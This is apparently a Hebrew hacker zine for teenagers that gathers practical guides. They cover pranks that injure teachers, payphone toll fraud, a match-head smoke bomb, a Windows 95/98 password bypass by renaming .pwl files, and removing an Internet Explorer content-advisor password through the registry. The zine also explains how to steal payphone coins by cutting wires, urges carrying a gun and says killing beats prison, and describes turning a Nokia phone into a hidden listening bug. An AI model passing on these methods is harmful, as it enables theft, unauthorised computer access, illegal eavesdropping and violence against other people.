‫‪.9‬להדביק ג'לי מגעיל על התקרה ואז כשהמורה יכנס לכיתה הג'לי ייפול לו על הראש והוא לא ישים‬
‫לב ‪.‬‬
‫‪.8‬לשים פתק על הגב של המורה ‪ -‬הכי בטוח וגם מצחיק ‪.‬‬
‫‪.7‬לכתוב בשירותים על הדלתות בגרפיטי ‪.‬‬
‫‪.6‬להביא פצצת סרחון ולזרוק לחדר מורים בתחילת היום ‪.‬‬
‫‪.5‬להוציא את הנייר טואלט מהשירותים ולהכניס אותו לאסלות בתחילת היום להוריד את כל המים‬
‫ולבוא ב ‪ 5‬לשמונה ולראות אקווריום ולא תיכון ‪.‬‬
‫‪.4‬לשים למורה בלון פלוצים ‪ ...‬ממש מצחיק ‪ (.‬אולי זה לא בעצם ) ‪.‬‬
‫‪.3‬לקחת את הנפצים הקטנים האלה שמוכרים אותם ב‪ 50‬ל‪ 3‬שקל ‪ -‬ולשים אותם מתחת ליומן של‬
‫הכיתה ‪ ,‬המורה יבוא וידפוק את היומן על הנפצים ואז הוא יקבל הלם ‪(.‬במקרה טוב הוא יהיה חירש‪-‬‬
‫סתם‪...‬לא יפה)‪.‬‬
‫‪ .2‬לטלפן לביה"ס ולעשות כאילו אתם ההורים של איזה ילד ולהגיד שאתם חייבים שהוא יחזור‬
‫הביתה בגלל אירוע משפחתי ‪ -...‬המזכירה תשחרר אותו והוא יגיע הביתה ולא ידע למה ‪( . ...‬או‬
‫לעשות את זה לכם כשאין לכם כוח ללמוד )‪.‬‬
‫‪.1‬‬
‫הדבר הכי פצצה‬
‫ללכת למזכירות ולבקש לטלפן לאחיך ולהגיד שזה בגלל אירוע משפחתי וזה דחוף‪ - ...‬אז במקום‬
‫להתקשר לאחיך תעשה לטלפון עקוב אחרי למספר ארוטי ‪ ...‬ואז כל מי שמתקשר לביה"ס מתבייש בו‬
‫וחושב שהוא הגיע למספר ארוטי=חחחח (את המספרים אפשר להשיג בכל סוף עיתון) ‪.‬‬
‫‪by old-hacker‬‬

‫שיחות חינם בטלפונים שעובדים על טלכרטים‬

‫כעת אני ילמד אתכם איך לזיין את "נזק" ולהשתמש בשירות גוביינא כדי לקבל‬
‫שיחות חינם ‪- .‬אחרי שתקראו את הפרק הזה אתם תגידו ביי לטלפון בבית ‪.‬‬
‫מצרכים ‪:‬‬
‫‪ .1‬צליל של ‪ - coin collet‬אפשר להוריד בפינת ההורדות באתר שלי ‪.‬‬
‫‪ .2‬אוזניות‬
‫‪ .3‬ווקמן\דיסקמן\ ‪ \ mp3player‬מיני דיסק ‪ -‬בקיצור כל דבר שאפשר להשמיע אייתו את הסאונד ‪(.‬‬
‫לאנשים מיוחדים ‪ -‬תנסו להתאמן לשרוק את הצליל ‪ -‬בצחוק ‪-‬אף אחד לא הצליח ולא יצליח ) ‪.‬‬
‫הפריצה‬
‫קודם כל מקליטים בבית על מכשיר ההקלטה (למשל ווקמן ) את הצליל‬
‫אח"כ הולכים לטלפון ציבורי ומחייגים‬
‫‪142‬‬
‫מצמידים את האוזניות לטלפון‬
‫מחכים ‪ 3\2‬שניות אחרי שעונים ומשמעים את הצליל לטלפון ויש קריין שמבקש ממך שתכניס סיסמא‬
‫‪.‬‬
‫הסיסמא היא אחד מהאפשריות הבאות ‪:‬‬
‫‪0000001‬‬
‫‪0000002‬‬
‫‪0000003‬‬
‫‪0000004‬‬
‫‪0000005‬‬
‫‪0000006‬‬
‫‪0000007‬‬
‫‪0000008‬‬
‫‪0000009‬‬
‫‪00000010‬‬
‫מתחילים משמאל ‪.‬‬
‫*הסיסמא אחרי כל שיחה משתנה ‪.‬‬
‫תנסו את כל ‪ 10‬האפשריות וכשתגלו את הסיסמא תשמעו צליל של קו ותחייגו לאן שבא לכם ‪.‬‬
‫יש לכם עכשיו טלפון חינם‪.‬‬
‫‪]by old-hacker [i.c.f‬‬

‫פצצת עשן‬
‫אני אלמד אתכם עכשיו איך להכין פצצת עשן !!‬
‫חומרים ‪:‬‬
‫הקרטון של המחברת (עדיף קרטון חלש )‬
‫דבק‬
‫חול‬
‫‪ 3‬קופסאות גפרורים‬
‫נייר דבק‬
‫נייר‬

‫הוראות הכנה‬
‫לוקחים ת' מחברת ומפרקים לה את הצורה ‪ -‬סתם‪...‬‬
‫‪ .1‬לוקחים את הקרטון וחותכים מרובע ‪.‬‬
‫‪ 2‬מדביקים עם נייר דבר‬
‫‪.3‬לוקחים את הראשים של הגפרורים ומפרקים אותם (גפרור אחד משאירים)‬
‫‪.3‬לוקחים דבק וחול מערבבים ויוצא כזאת עיסה ‪ ,‬שופכים אליה את ראשי הגפרורים‪.‬‬
‫‪.4‬מבאים נייר ארוך ושמים אותו מסוף הקרטון להתחלה ומוצאים בערך ‪ 3‬ס"מ‬
‫מהקרטון‪.‬‬
‫‪.5‬עושים מהכל גליל ‪.‬‬
‫‪ .6‬מדליקים את הנייר שנשאר בחוץ עם הגפרור שנשאר ‪ -‬יש עשן(הרבה‪ ... )...‬אם‬
‫תשימו יותר גפרורים יהיה יותר עשן ‪.‬‬
‫איור ‪:‬‬
‫ככה בערך אמור לצאת‬
‫______________________________‬
‫&*&*&*&*&**&**&*&*&*****‬
‫&*&*&*&*&*&*&*&*&*******‬
‫>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>‬
‫&*&*&**&*&**&*&*&**&&***‬
‫_&&*&*&&*&&*&*&_&****____‬
‫בהתחלה כדי לשים יותר ראשי גפרורים מדבק ‪ -‬כדי שיידלק טוב ‪.‬‬
‫מקרא ‪:‬‬
‫_ = גליל‪.‬‬
‫& = עיסה של הדבק והחול ‪.‬‬
‫*=ראשי גפרורים ‪.‬‬
‫>>> = נייר‬
‫‪]by old-hacker [i.c.f‬‬

‫פריצת סיסמאות ‪windows95/98‬‬
‫כתבתי את הכתבה הזאת כדי להראות לכם כמה שהווינדוס שלכם לא מוגן‪.‬‬
‫בעוד עשר‪ ,‬חמש עשרה דקות‪ ,‬כשתגמרו כבר לקרוא את הכתבה‪,‬‬
‫אתם תעריכו את המערכת הפעלה שלכם הרבה פחות‪ ,‬את עצמכם הרבה יותר‪,‬‬
‫ותוכלו להראות לחברים שלכם איזה ידע נפלא יש לכם‪ .‬אבל הכי חשוב‪,‬‬
‫תוכלו לחדור לכל מחשב שמותקן עליו ‪ windows95/98‬אפילו אם הוא מוגן עם סיסמא‪.‬‬
‫רק דבר אחד לפני שאנחנו מתחילים ‪ -‬הפריצה הזאת היא פריצה לוקלית‪ ,‬מקומית‪.‬‬
‫כלומר היא עובדת רק אם יש לכם גישה פיזית למחשב שאליו אתם חודרים‪ .‬יעיל מאוד במקרים‬
‫הבאים‪:‬‬
‫בי"ס‪ ,‬מפעלים‪ ,‬בנקים‪ ,‬חנויות‪ ,‬חברים‪ ,‬וכו'‬
‫הגנת סיסמא‬
‫דבר ראשון‪ ,‬כדי להראות לכם איך לפרוץ את הסיסמא‪ ,‬צריך קודם להגן עם סיסמא‪.‬‬
‫איך אפשר לפרוץ משהו שלא קיים? אי אפשר‪.‬‬
‫לכן אם הווינדוס שלכם עוד לא מוגן בעזרת סיסמא‪ ,‬עשו את הצעדים הבאים‪:‬‬
‫לחצו על התחל‪ ,‬אפשרויות‪ ,‬לוח בקרה‪.‬‬
‫עכשיו לחצו על סיסמאות‪ ,‬תבחרו סיסמא שתוכלו לזכור‪ ,‬ותקלידו אותה‪.‬‬
‫התחילו את המחשב מהתחלה‪ .‬כמו שאתם רואים‪ ,‬הווינודס יבקש סיסמא‪ .‬כיתבו סיסמא לא נכונה‪.‬‬
‫מה קרה?‬
‫עכשיו כיתבו את הסיסמא הנכונה‪ ...‬מה קרה הפעם?‬
‫כמו שאתם רואים‪ ,‬אי אפשר להיכנס לווינדוס בלי לדעת את הסיסמא‪ ,‬נכון?‬
‫‪ =====--‬לא‪ ,‬לא נכון! =====‪---‬‬‫פריצת הסיסמא‬
‫אני אראה לכם פה כמה שיטות‪ ,‬אנא נסו את כולם‪.‬‬
‫אח"כ תבחרו את זו שאתם הכי אוהבים‪ ,‬ותעשו חיים‪.‬‬
‫שיטה מספר ‪1‬‬
‫* התחילו את המחשב מהתחלה‬
‫* לחצו ברציפות על כפתור ה ‪ f5‬הרבה פעמים בלי להפסיק‪.‬‬
‫מה שיקרה זה שהוונידוס יתחיל במצב ‪safe mode‬‬
‫מצב זה נועד לתיקון תקלות בווינדוס‪ ,‬ולכן אינו מבקש סיסמא‪.‬‬
‫אומנם הכל ייראה קצת מוזר‪ ,‬ולא תוכלו להתחבר לאינטרנט‪,‬‬
‫אבל כל התוכנות יעבדו חלק‪ ,‬ויש לכם גישה להכל‪.‬‬
‫אם הסיסמא נועדה לדוגמא להגן על קבצי טקסט מסוימים‪,‬‬
‫אז הרגע שברתם את ההגנה העלובה‪ ,‬ואתם יכולים לגשת לקבציי טקסט ה"מוגנים" האלה‪.‬‬

‫שיטה מספר ‪2‬‬
‫* התחילו את המחשב מהתחלה‬
‫* לחצו ברציפות על כפתור ה ‪ f8‬הרבה פעמים בלי להפסיק‪.‬‬
‫אתם תקבלו תפריט שייתן לכם לבחור איך להתחיל את המחשב‪ .‬בחרו ב ‪command prompt only‬‬
‫מה שיקרה זה שהמחשב ייכנס לדוס‪ .‬למי שלא מכיר‪ ,‬דוס זה בעצם מערכת הפעלה שפועלת ע"י‬
‫פקודות מהמשתמש‪.‬‬
‫ווינדוס בעיקרון מבוסס על הגרעין של דוס אבל לא חשוב‪.‬‬
‫עכשיו הקלידו את השורה הבאה ולחיצו על מקש ה ‪:enter‬‬
‫‪rename c:\windows\*.pwl c:\windows\*.xxx‬‬
‫מה שבעצם קורה פה זה הדבר הבא‪:‬‬
‫מכיוון שאתם לא נכנסים לווינדוס עדיין‪ ,‬אז אתם לא צריכים להקליד סיסמא‪.‬‬
‫עכשיו‪ ,‬כשאתם כן צריכים להקליד סיסמא‪ ,‬כלומר כשאתם כן נכנסים לווינדוס‪ ,‬אז איך המחשב יודע‬
‫אם הסיסמא‬
‫שכתבתם נכונה או לא? פשוט מאוד‪ .‬הוא משווה את מה שאתם כתבתם לסיסמא האמיתית שנמצאת‬
‫בתוך קובץ על‬
‫המחשב‪ .‬אם מה שכתבתם תואם למה שבקובץ‪ ,‬הוא יודע שזה הסיסמא הנכונה‪ ,‬אם לא‪ ,‬אז הוא יודע‬
‫שלא‪.‬‬
‫עכשיו‪ ,‬אם כך אז כל מה שהאקר צריך לעשות זה לפתוח את הקובץ ההוא‪ ,‬ואז הוא יודע את‬
‫הסיסמא‪ ,‬נכון?‬
‫לכן מה שמיקרסופוט עשתה זה הצפינו אותו ע"י פעולה מתמטית‪ ,‬כאשר כל פעם שהם משווים בין‬
‫הקבצים‬
‫הם עושים את אותה הפעולה למה שהקלדתם ואז משווים‪ ,‬כך אם תפתחו את אותו הקובץ‪,‬‬
‫הסיסמא תיראה באותיות לא מובנות ולא תוכלו לדעת מה היא אלא אם כן תדעו את אותה‬
‫פעולה מתמטית ואז תתכנתו משהו שעושה את אותה הפעולה אבל הפוך‪.‬‬
‫הבעיה שלא תוכלו לדעת מה היא אותה פעולה מתמטית‪...‬‬
‫בכל מקרה‪ ,‬אנחנו לוקחים את אותו הקובץ (‪ ,).pwl‬ומשנים אותו ל ‪.xxx‬‬
‫כמו כן תוכלו לשנות אותו לכל דבר אחר‪ ,‬לדוגמא‪:‬‬
‫‪rename c:\windows\*.pwl c:\windows\*.fuk‬‬
‫העיקר הוא שלקובץ לא יהיה שיוך‪ .‬כלומר שהווינדוס לא יזהה את סוג הקובץ‪ .‬לדוגמא אל תהפכו את‬
‫זה ל‪:‬‬
‫‪ - .jpg‬גרפיקה‬
‫‪ - .gif‬גרפיקה‬
‫‪ - .bmp‬גרפיקה‬
‫‪ - .txt‬מסמך טקסט‬
‫‪ - .doc‬מסמך של וורד‬
‫‪ - .ppt‬מסמך של פאור פוינט‬
‫‪ - .mp3‬קובץ סאונד‬
‫‪ - .wav‬קובץ סאונד‬
‫‪ - .mid‬קובץ סאונד‬
‫אני חושב שקלטתם את הרעיון‪...‬‬
‫עכשיו‪ ,‬תתחילו את המחשב מהתחלה‪.‬‬
‫אתם אומנם תקבלו את התיבה שמבקשת סיסמא‪ ,‬אך תוכלו להקליד איזה סיסמא שבא לכם‪...‬‬

‫זה ‪ 100%‬יעבוד‪ .‬זאת מכיוון שהווינדוס לא מוצא את הקובץ שאליו הוא אמור להשוות‪ .‬ולכן כל מה‬
‫שתקלידו‬
‫יהיה נכון‪ .‬הווינדוס יקבל את זה כסיסמא חדשה‪ ,‬זאת מכיוון ששוב‪ ,‬הווינדוס לא מוצא שום קובץ‬
‫סיסמא‬
‫במחשב‪ ,‬ולכן תתבקשו לאשר את הסיסמא החדשה‪ .‬עכשיו‪ ,‬כשאתם גומרים לעשות מה שרציתם‬
‫לעשות עם המחשב‪,‬‬
‫החזירו את הסיסמא הישנה כדי שאף אחד לא ידע מה שעשיתם‪ ....‬איך מחזירים את הסיסמא‬
‫הישנה?‬
‫פתחו חלון דוס‪ ,‬והקלידו את השורה הבאה ולאחר מכן לחצו על מקש ה ‪:enter‬‬
‫‪rename c:\windows\*.xxx c:\windows\pwl‬‬
‫או אם שיניתם ל ‪ .fuk‬אז הקלידו את זה כך‪:‬‬
‫‪rename c:\windows\*.fuk c:\windows\pwl‬‬
‫שיטה מספר ‪3‬‬
‫שיטה מספר ‪ 3‬מבוססת על שיטה מספר ‪.2‬‬
‫* התחילו את המחשב מהתחלה‬
‫* לחצו ברציפות על כפתור ה ‪ f8‬הרבה פעמים בלי להפסיק‪.‬‬
‫אתם תקבלו תפריט שייתן לכם לבחור איך להתחיל את המחשב‪ .‬בחרו ב ‪command prompt only‬‬
‫עכשיו‪ ,‬הרעיון בשיטה ‪ 3‬זה לא להיכנס לווינדוס‪ ,‬אלא פשוט להשיג גישה לקבצים על המחשב‪.‬‬
‫למי שמכיר את דוס‪ ,‬שייהנה‪ .‬למה שלא‪ ,‬אני אתן פה קצת עזרה‪...‬‬
‫תבדקו שאתם בספרייה הראשית‪ ,‬כדי לעשות זאת הקלידו‪:‬‬
‫\‪c:‬‬
‫עכשיו שאתם בספרייה הראשית הקלידו‬
‫‪dir‬‬
‫כדי להיכנס לספרייה ששם נמצאים הקבצים שאתם רוצים הקלידו‬
‫‪cd directory‬‬
‫לדוגמא אם לספרייה קוראים ‪ xfiles‬אז תקלידו‬
‫‪cd xfiles‬‬
‫ואם לספרייה קוראים ‪ games‬אז תקלידו‬
‫‪cd games‬‬
‫עכשיו שוב הקלידו‬
‫‪dir‬‬
‫הכניסו דיסקט לכונן דיסקטים ותעתיקו את הקבצים שאתם רוצים‪ .‬אם אתם רוצים את כולם‪,‬‬
‫הקלידו‬
‫‪copy *.* a:‬‬
‫אם אתם רוצים קובץ מסוים‪ ,‬לדוגמא ‪ game.exe‬הקלידו‬
‫‪copy game.exe a:‬‬
‫זהו‪ ,‬סיימנו לכתבה הזאת‪ ,‬ורק לסיכום‪,‬‬
‫אם עד עכשיו חשבתם שהקבצים שלכם במחשב מוגנים‪ ,‬כדאי שתחשבו עוד פעם‪ .‬עד לכתבה הבאה‪.‬‬
‫‪gehenom‬‬

‫איך לגנוב כסף ממכשירי טלפון‬
‫מכירים את המכשירים האלה ששמים שקל ואז אפשר להתקשר?‬
‫אפשר למצוא אותם בעיקר באיזה מקום תקוע בעיר‪ ,‬במוסדות חינוך‪ ,‬ומתנ"סים‪.‬‬
‫שדידת מכשיר טלפון כזה צורכת רק כמה דברים פשוטים‪ .‬לכן גם השרוטים שביניכם יוכלו לעשות‬
‫זאת‪.‬‬
‫דבר ראשון‪ ,‬אל תתנהגו כמו מטומטמים‪ .‬אתם בני זונות‪ .‬תזכרו את זה‪.‬‬
‫או במילים אחרות‪ ,‬אל תבואו באמצע היום מול מלא אנשים לעשות את עבודתכם‪.‬‬
‫כמו כן אל תכריזו לפני כל החברים שלכם שגנבתם ‪ 500‬שקל מאיזה טלפון ציבורי בצומת‪...‬‬
‫טוב‪ ,‬כעת מייצאו טלפון כזה שיש לכם גישה לחוטי החשמל שלו‪.‬‬
‫פשוט חפשו את הכבל שמתפתל צמוד לקיר או את המצמת (תיבת חיבור)‪.‬‬
‫עכשיו‪ ,‬בקו טלפון רגיל‪ ,‬יהיה שני חוטי חשמל‪ .‬אדום וירוק‪.‬‬
‫בטלפון מסוג כזה‪ ,‬יהיו ארבעה‪ .‬אדום וירוק לתפעול התקשורת (העברת פולסים ושטויות)‪,‬‬
‫וצהוב ושחור בשביל בדיקת המטבעות‪ .‬חפשו מקום בכבל שבו חתך לא ייראה בולט לעין‪.‬‬
‫שליפו את הסכין שלכם וחיתכו בעדינות חלק מן הכבל כך שייחשפו ארבעת חוטי החשמל הצבעוניים‪.‬‬
‫חיתכו לגמרי את השחור והצהוב והניחו לאנשים לנסות להשתמש בטלפון‪!...‬‬
‫מה קורה פה?‬
‫^^^^^^^^^^^‬
‫ובכן‪ ,‬כשאתם שמים לדוגמא מטבע של ‪ 5‬שקל בתא הרסיבר (‪ )receiver‬של המכשיר בכדי לעשות‬
‫שיחה‪,‬‬
‫המטבע נופל לתוך תיבת המטבעות הזמנית ונשאר שם עד שאחד משלושת הדברים הבאים קורים‪:‬‬
‫* התקשרתם‪ ,‬דיברתם‪ ,‬ניתקתם‪ ,‬והמטבע נשלך מתוך תיבת המטבעות הזמנית אל תיבת המטבעות‬
‫הרגילה‬
‫ופוגש שם את כל השקלים שהיו שם לפני כן ונשאר שם עד שטכנאי מוסמך של בזק בא עם מפתח‬
‫מיוחד‪ ,‬פותח את התיבה‪ ,‬ומוציא את כל הכסף‪...‬‬
‫* התקשרתם‪ ,‬דיברתם‪ ,‬ניתקם‪ ,‬אבל שילמתם יותר ממה שהיה צריך‪ .‬הכל מחושב‪ ,‬העודף נופל‬
‫לתיבת העודף‪,‬‬
‫והשארית לתיבת המטבעות הרגילה ופוגש שם את כל השקלים שהיו שם לפני כן ונשאר שם עד‬
‫שטכנאי‬
‫מוסמך של בזק בא עם מפתח מיוחד‪ ,‬פותח את התיבה‪ ,‬ומוציא את כל הכסף‪...‬‬
‫* התקשרתם‪ ,‬אף אחד לא ענה‪ ,‬או שהיה תפוס‪ ,‬או משהו דומה‪ ,‬ואז ניתקתם‪.‬‬
‫ברגע שניתקתם המטבע נופל מתיבת המטבעות הזמנית ישר לתוך תא העודף‪.‬‬
‫זה פחות או יותר הסוד שעומד מאחורי רעיון השדידה שלנו פה‪.‬‬
‫אתם פשוט מאוד חוזרים בשעה ‪ 3:00‬לפנות בוקר‪ ,‬מחברים בחזרה את חוט החשמל השחור‬
‫וגם כמובן את חוט החשמל הצהוב‪ ,‬מדביקים עם סלוטייפ או משהו‪ ,‬מרימים את השפופרת‬
‫ומקשיבים לצליל שאומר שיש קו (בפממממממממממממממ‪ ,)...‬ומנתקים‪.‬‬
‫החלק הכייפי‬
‫‪#############‬‬
‫הכסף יתחיל להתגלגל החוצה בדיוק כמו בסרטים!!!!!‬

‫מומלץ להכין שקית מראש‪ ,‬למה לא בטוח שיהיה מקום בכיסים‪.‬‬
‫השיא שלי זה ‪ 614‬שקל בלילה יחיד!!! (כמובן שעשיתי את זה ביותר מטלפון אחד באותו לילה)‪.‬‬
‫כמה טיפים‪:‬‬
‫* מומלץ ללבוש בגדים שחורים‪.‬‬
‫* מומלץ לבוא עם אופנוע‪.‬‬
‫* מומלץ להיזהר מגמדים הומואים שמנים בכחול שיוצאים מניידת כחולה ומגעילה‪.‬‬
‫* אם מישהו רואה אתכם‪ ,‬פשוט תגידו לו שהכל נפל ככה סתם‪ .‬גם לא יזיק לתת לו קצת אחוזים‪...‬‬
‫רק הערה אחרונה‪ :‬כשאנשים ישימו שקל או שתיים אחרי שחתכתם את החוטים‪ ,‬הכסף יישאר‬
‫במכונה‪,‬‬
‫והם גם לא יוכלו להתקשר‪ ,‬כי החוטים שאחראים על בדיקת המטבעות לא יהיה פעילים‪...‬‬
‫אם זה יעצבן אותם מאוד‪ ,‬הם עלולים לקרוא לטכנאי של בזק‪ .‬לכן תבואו עם אקדח למקרה חירום‪.‬‬
‫עדיף להרוג מאשר לשבת מאחורי סורגים‪ .‬באמת‪.‬‬
‫אז עד הפעם הבאה‪,‬‬
‫‪gehenom‬‬

‫הכנת מכשיר ציטוט מהפלאפון‬
‫אוהבים את ג'יימס בונד? אני לא‪.‬‬
‫בכל מקרה‪ ,‬מסקר שערכנו יוצא כי הפלאפון הפופולרי‬
‫ביותר באזור ירושלים הוא ה ‪ nokia 5110‬של רשת אורנג'‪.‬‬
‫ובכן‪ ,‬עם הפלאפון הזה אתם יכולים להכין מכשיר‪ ,‬אשר בעזרתו תוכלו לצטט לאנשים‪.‬‬
‫זה לא כמו הציטוט לשיחות עם המוטורלה של רשת פלאפון‪ ,‬אלא ממש מכשיר האזנה אמיתי כמו של‬
‫המשטרה‪.‬‬
‫מחביאים אותו באיזה מקום בחדר ואז אפשר לשמוע את כל שמדברים שם‪ .‬לדוגמא‪ ,‬תשאירו אותו‬
‫בכיתה ביום של אסיפת הורים ותשמעו בדיוק מה המורה שלכם אומר לכל הורה והורה‪ .‬זה אמנם לא‬
‫חוקי‪,‬‬
‫ועובר על חופש הפרט‪ ,‬אבל צוות האתר סומך על כך שתשתמשו בזה נכון ורק למקרים הנכונים‪.‬‬
‫אף אחד לא שם זין על החוק‪ ,‬אבל אם אין לכם כבוד לבני אדם אחרים אז איבדתם משהו‪...‬‬
‫בכל מקרה‪ ,‬להכנת מכשיר כזה מהפלאפון שלכם אתם צריכים את הכלים הבאים‪:‬‬
‫* פלאפון מדגם ‪ 5110‬של נוקיה‬
‫* את הכתבה הזאת (מומלץ להדפיס)‬
‫* את המוח שלכם (מומלץ לבדוק שהוא עובד ע"י דפיקת הראש בקיר)‬
‫טוב‪ ,‬כעת דבר ראשון שתעשו הוא להגדיר את הפלאפון ל"מענה אוטומטי" ולשים אותו במצב שקט‪.‬‬
‫ועכשיו גבירותיי ורבותיי‪,‬‬
‫החלק המתוחכם שעושה את כל הקסם‪ .‬בתחתית הפלאפון‪ ,‬ישנם פינים‪ ,‬שכאשר מחברים ביניהם‪,‬‬
‫עלול להיווצר קצר‪ .‬קחו חוט חשמל‪ ,‬ובזהירות חברו בין הפין האמצעי בצד שמאל לפין הימני‪.‬‬
‫ברגע שזה ייקרה הפלאפון שלכם ייתקע ומייד ייכנס למצב 'אוזנייה'‪.‬‬
‫כעת כל שעליכם לעשות הוא להחביא את הפלאפון איפושהו בחדר של הקורבן‪.‬‬
‫עכשיו לכו הביתה והתקשרו מהטלפון שלכם או מאיזה פלאפון שגנבתם למספר של הפלאפון שאותו‬
‫הפכתם למכשיר האזנה‪ .‬הפלאפון מיד יקבל את השיחה‪ ,‬מה שלא עולה כסף כי זאת שיחה נכנסת‪,‬‬
‫ואתם‬
‫תשמעו את כל מה שמי שנמצא באזור הפלאפון שלכם אומר ועושה‪ .‬רק תזכרו שמכשיר האזנה עולה‬
‫הרבה יותר‬
‫מפלאפון‪ ,‬ולכן אם אתם משתמשים במידע זה בכדי להכין מכשיר כזה מהפלאפון שלכם‪ ,‬לא יזיק אם‬
‫תשלחו‬
‫לי ‪ 300 ,200‬שקל בדואר‪.‬‬
‫שלכם‪,‬‬
‫‪gehenom‬‬

‫פריצת סיסמת הצנזורה של ‪internet explorer‬‬
‫הדפדפן של מיקרוסופט‪ ,‬עם כל הדברים הטובים שבו‪ ,‬והפופלריות שלו‪ ,‬הוא לא הדפדפן הכי מוגן‪.‬‬
‫בכתבה הזאת אני אראה לכם משהו שלא ממש רציתם לדעת על הדפדפן אינטרנט שאתם כל כך‬
‫אוהבים‪.‬‬
‫כפי שידוע‪ ,‬בדפדפן של מיקרוסופט קיימת האפשרות לצנזר אתרים מסוימים ולחסום אליהם את‬
‫הגישה‪.‬‬
‫הדבר נועד למורים‪/‬הורים שלא רוצים שאנחנו הילדים נוכל להיכנס לאתרי פורנוגרפיה‪ ,‬אנרכיה‪ ,‬וכו'‬
‫אבל לפני שאני אראה לכם איך להוריד את הגנת הסיסמא‪ ,‬קודם‪ ,‬לאלה מכם שלא מצנזרים להם‪,‬‬
‫אני רק אראה למה אני מתכוון‪ .‬פיתחו את הדפדפן (‪.)internet explorer‬‬
‫לחצו על תפריט ‪tools‬‬
‫בחרו ב ‪internet options...‬‬
‫חלון חדש ייפתח‪ ,‬עם כל מיני תפריטים כגון‪ ,general, security, content, connections :‬ועוד‪...‬‬
‫לחצו על ‪content‬‬
‫התבוננו ב ‪ content advisor‬לרגע‪.‬‬
‫זה נועד לחסום גישה לאתרים‪ ,‬ואפשר להוריד את החסימה רק על ידי סיסמא‪.‬‬
‫כדי להראות לכם למה אני מתכוון לחצו על כפתור ה ‪enable‬‬
‫ותפעילו את החסימה‪ .‬שימו סיסמא שתוכלו לזכור‪ .‬סגרו את הדפדפן‪.‬‬
‫פיתחו אותו מחדש‪ .‬עכשיו נסו להיכנס לאתר שחסמתם‪ .‬מה קורה? יפה‪.‬‬
‫עכשיו נסו להוריד את החסימה‪ .‬זה יבקש ממכם סיסמא‪ .‬אתם כמובן יודעים אותה‪ ,‬כי אתם בחרתם‬
‫אותה‪,‬‬
‫אבל נניח אתם לא יודעים אותה‪ .‬הקלידו סיסמא שגויה‪ .‬מה קורה? אחלה‪ .‬עכשיו את הסיסמא‪.‬‬
‫כמו שאתם רואים אתם עכשיו יכולים לבטל את החסימה‪ .‬אבל אל תבטלו‪ .‬עכשיו הגיע הזמן שתראו‬
‫איך‬
‫פורצים את זה בלי לדעת את הסיסמא‪ .‬מוכנים? אני ממליץ להדפיס את הקטע הבא‪,‬‬
‫כי זה לא משהו שקל לזכור בעל פה‪ .‬אז איך בדיוק עושים את זה? עם הרג'יסטרי‪.‬‬
‫‪windows registry‬‬
‫מה זה הרג'יסטרי?‬
‫הרג'יסטרי זה פשוט דאטאבייס (‪ )database‬ענק שבווינדוס ‪ nt/95/98‬הוא בעצם‬
‫מחליף את כל קבצי ה ‪ .pif‬וה ‪ .ini‬ועוד כל מיני קבצי אינפורציה שהיו לנו בווינדוס ‪ 3.11‬ו ‪3.1‬‬
‫אז במילים אחרות‪ ,‬כל האפשרויות (‪ )settings‬של החומרה‪ ,‬וכל מיני תוכנות נמצאות שם‪ .‬עכשיו‬
‫הכירו את‬
‫עורך הרג'יסטרי ‪ .regedit -‬אתם תשמשו בעורך הזה הרבה‪ .‬אם כדי לתקן בעיות במחשב‪ ,‬לעשות‬
‫שיפורים‪,‬‬
‫או לדוגמא‪ ,‬לפרוץ את סיסמת ההגנה של אינטרנט אקספלורר‪.‬‬
‫אני עכשיו לא אראה לכם צעד אחר צעד איך משתמשים בעורך‪ ,‬כי זה לוקח זמן‪.‬‬
‫מה שכן‪ ,‬אני אראה לכם צעד אחר צעד איך לפרוץ את הסיסמא‪.‬‬
‫פריצת הסיסמא‬
‫כשהדפדן פתוח‪ ,‬עשו את הצעדים הבאים‪:‬‬
‫* לחצו על התחל‬

‫* הפעלה‪...‬‬
‫* הקלידו‪ regedit :‬ולחיצו על ‪enter‬‬
‫העורך ייפתח‪ .‬לחיצו לחיצה כפולה על‪:‬‬
‫‪hkey_local_machine -> software -> microsoft -> windows -> current version -> policies‬‬
‫התבוננו בציידו הימיני של העורך‪ .‬אם יש הגנת סיסמא‪ ,‬אתם תראו משהו שכתוב עליו ‪.key‬‬
‫סמנו את זה עם העכבר ולחיצו על מקש ה ‪ .delete‬לאחר שמחקתם את זה‪ ,‬הסיסמא כבר לא תהיה‬
‫קיימת‪.‬‬
‫זה מכיוון שהסיסמא הייתה בפנים‪ .‬היא פשוט הייתה מוצפנת כמובן‪ ....‬זאת כדי שלא תוכלו לדעת‬
‫מה היא‪,‬‬
‫אם כי קיימות תוכנות שהופכות את זה לטקסט נקי ומראות לכם מה הסיסמא‪ .‬אבל תוכנות כאלה‬
‫בד"כ לא ניתנות‬
‫להפצה בחינם‪ ,‬והם בהחלט לא שוות את הכסף שמבקשים עבורם‪ .‬אם אתם בכל זאת מעונינים‪ ,‬נסו‬
‫את האתר הבא‪:‬‬
‫‪http://www.ntbugtraq.com‬‬
‫רק הערה אחרונה ‪ -‬אחרי שאתם מוחקים את הסיסמא‪ ,‬תסגרו את הדפדפן‪ ,‬ותיכנסו אליו שוב‪.‬‬
‫תעשו את זה כדי שהדפדפן יידע שאין יותר סיסמא‪ .‬הוא בודק ברג'יסטרי רק כשהוא נפתח מחדש‪.‬‬
‫לכן אם הוא פתוח כשאתם מוחקים את הסיסמא‪ ,‬הוא לא יידע שמחקתם‪ ,‬ויבקש סיסמא‪...‬‬
‫אז פשוט סגרו את הדפדפן‪ ,‬ואז תפתחו אותו שוב‪ ,‬ולא יהיה בעיות‪.‬‬
‫זהו‪.‬‬
‫עכשיו לכו לבי"ס‪,‬‬
‫תעיפו את ההגנה של הדפדפן‪ ,‬ותגלשו חופשי‪.‬‬
‫שלכם‪,‬‬
‫‪gehenom‬‬

‫שימוש חוזר בכרטיסי טלכרט‬
‫כ‪-‬ע‪-‬ת תלמדו איך להשתמש בכרטיסי טלכרט שנגמרו'‪.‬‬
‫דבר ראשון‪ ,‬עליכם למצוא כמה טלכרטים מ ש ו מ ש י ם‪ .‬כן‪ ,‬משומשים‪.‬‬
‫בשביל זה לכו לאוסף טלכרטים של אח שלכם הקטן ותגנבו לו חאפלה של איזה ‪.20‬‬
‫עדיף טלכרטים ישנים‪ ,‬למה הרבה מהחדשים מוגנים מפני הטריק שאני אראה לכם פה‪.‬‬
‫כמו כן עדיף שיהיה לכם איזה ‪ 20‬כי בניסיונות הראשונים זה בד"כ לא יוצא משהו ומה שקורה‬
